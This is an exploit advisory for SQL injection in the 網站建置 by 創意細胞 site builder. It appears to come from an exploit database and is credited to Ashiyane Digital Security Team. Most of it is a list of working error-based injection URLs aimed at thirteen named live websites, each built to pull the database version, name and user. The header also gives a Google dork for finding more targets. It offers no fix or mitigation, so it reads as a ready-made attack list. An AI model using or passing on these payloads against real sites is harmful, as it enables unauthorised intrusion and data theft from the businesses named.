######################
# Exploit Title : 網站建置 by 創意細胞 SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.mydesigncell.com/
# Google Dork : intext:"創意細胞" inurl:news_detail.php?
# Date: 2016 01 10
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# demos :
# http://www.louyoung.org.tw/news_detail.php?id=20%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.4flower.com.tw/news_detail.php?id=28%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.anajessica.com.tw/news_detail.php?id=10%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.hjc.tw/news_detail.php?id=5%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.prettycentury.com/news_detail.php?id=34%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.vigorbeauty.com/news_detail.php?id=2%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.holove.com.tw/news_detail.php?id=15%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.ps-hair.com.tw/news_detail.php?id=156%27%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--%20-
# http://www.charmeurlady.com/news_detail.php?id=6%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.labbybaby.com.tw/news_detail.php?id=14%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.kiskisbaby.com/news_detail.php?id=4%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.renova.com.tw/news_detail.php?id=2%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
# http://www.vigorbeautyspa.com.tw/news_detail.php?id=33%20or%201%20group%20by%20concat_ws(0x3a,version(),database(),user(),floor(rand(0)*2))%20having%20min(0)%20or%201--
######################
# discovered by : modiret
######################